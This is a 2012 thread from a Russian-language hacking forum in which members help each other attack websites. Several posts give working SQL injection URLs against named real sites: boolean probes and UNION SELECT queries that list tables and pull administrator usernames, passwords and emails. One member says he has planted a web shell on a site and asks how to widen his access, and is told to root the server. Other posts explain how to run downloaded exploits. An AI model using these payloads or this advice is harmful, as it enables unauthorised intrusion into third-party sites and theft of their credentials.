 |
|
16.11.2012, 17:23
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от p1oneer
"
passwd
" – не вижу такой каталог, хотя в etc вообще нет папок. Это значит у меня не хватает прав?
это значит что passwd Не каталог а файл, и тебе срочно надо курить книжку по linux. смекаешь?
Сообщение от intertrey
хм
http://0214.by/catalog.php?id=130 AnD 1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 0 ЛОЖЬ
а у строковых также?
http://0214.by/catalog.php?id=130' AnD '1 ИСТИНА
http://0214.by/catalog.php?id=130' AnD '0 ЛОЖЬ
Это как аналоги сравнения для:
http://0214.by/catalog.php?id=130' AnD 'hexon'='hexon ИСТИНА
http://0214.by/catalog.php?id=130' AnD 'hexon'>'hexjector ЛОЖЬ
Равнозначны или не?)
http://0214.by/catalog.php?id=130+and+0+union+select+1,version(), 3,4,5,6,7,8,9,10--+
внимательнее. смотри в тайтл
|
|
|
16.11.2012, 18:28
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от intertrey
Эм. Я чуток о другом спросил, сайт просто для примера привел, мне не интересны ни колонки ни title
Вот это http://0214.by/catalog.php?id=130' AnD '1 и вот это http://0214.by/catalog.php?id=130' AnD 'hexon'='hexon одно и тоже по сути? Просто для себя скрипт пишу, вырабатываю оптимальный алгоритм под свои нужны. У меня на некоторых сайтах фильтруется и '=' и операторы сравнения '>'. Просто если Я хочу интежер сравнивать между собой, то могу указать вот так вот просто:
http://0214.by/catalog.php?id=130 AnD 1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 0 ЛОЖЬ
а не:
http://0214.by/catalog.php?id=130 AnD 1=1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 1>2 ЛОЖЬ
Также можно сделать для string? Справка от mysql http://www.mysql.ru/docs/man/Comparison_Operators.html не дала мне точного ответа)
and 1
and 0
такая конструкция работает не во всех СУБД
лучше and 1=1 / and 1=0
для string (MySQL)
SELECT * FROM `products` WHERE 'antichat' (empty set)
SELECT * FROM `products` WHERE 'antichat'='antichat' (true)
|
|
|
|
17.11.2012, 00:19
|
|
Новичок
Регистрация: 03.06.2012
Сообщений: 9
С нами:
7337846
Репутация:
0
|
|
Дело в том что я залил шелл в раздел banners, но не могу перейти ни в какой раздел кроме этого, так-как ограничены права. Я слышал что можно залить файл htaccess прописав что-то и другие папки будут иметь полные права. Так ли это или есть другие способы открыть полные права на другие разделы?
|
|
|
|
17.11.2012, 00:57
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%20 1,2,concat%280x3c696e6a5f646174613e,table_name,0x3 c2f696e6a5f646174613e%29,4,5,6,7,8,9,10,11,12,13%2 0from%20information_schema.tables%20limit%2029,1
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%20 1,2,concat%28user,0x3a,pass,0x3a,email%29,4,5,6,7, 8,9,10,11,12,13%20from%20zp_administrators%20limit %200,1
WTF?
|
|
|
|
17.11.2012, 02:05
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от avegolove
Дело в том что я залил шелл в раздел banners, но не могу перейти ни в какой раздел кроме этого, так-как ограничены права. Я слышал что можно залить файл htaccess прописав что-то и другие папки будут иметь полные права. Так ли это или есть другие способы открыть полные права на другие разделы?
ограниченные права на сервере? так как ты хочешь поднять права посредством .htaccces? тебе рутать надо а не htaccess заливать
Сообщение от vaddd
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%20 1,2,concat%280x3c696e6a5f646174613e,table_name,0x3 c2f696e6a5f646174613e%29,4,5,6,7,8,9,10,11,12,13%2 0from%20information_schema.tables%20limit%2029,1
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%20 1,2,concat%28user,0x3a,pass,0x3a,email%29,4,5,6,7, 8,9,10,11,12,13%20from%20zp_administrators%20limit %200,1
WTF?
читаем статью нолика. несколько раз.
|
|
|
|
17.11.2012, 12:51
|
|
Новичок
Регистрация: 03.06.2012
Сообщений: 9
С нами:
7337846
Репутация:
0
|
|
Ограниченные а как можно поднять права?
|
|
|
|
17.11.2012, 16:39
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от avegolove
Ограниченные а как можно поднять права?
тебе ж сказали, рутать
|
|
|
|
17.11.2012, 17:10
|
|
Познающий
Регистрация: 11.09.2012
Сообщений: 30
С нами:
7193846
Репутация:
0
|
|
непойму, как юзать сплойты с http://www.exploit-db.com
|
|
|
|
17.11.2012, 18:17
|
|
Познающий
Регистрация: 25.10.2012
Сообщений: 61
С нами:
7130486
Репутация:
0
|
|
Сообщение от seozone
непойму, как юзать сплойты с http://www.exploit-db.com
конкретизируй свой вопрос.. там много разных сплоитов, на разных языках
|
|
|
|
17.11.2012, 20:34
|
|
Постоянный
Регистрация: 12.02.2012
Сообщений: 300
С нами:
7499126
Репутация:
24
|
|
Сообщение от seozone
непойму, как юзать сплойты с http://www.exploit-db.com
Python:
./exploit.py -some key
C/C++
gcc –o exploit exploit.c #это очень грубый пример
читай про gcc компилятор
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
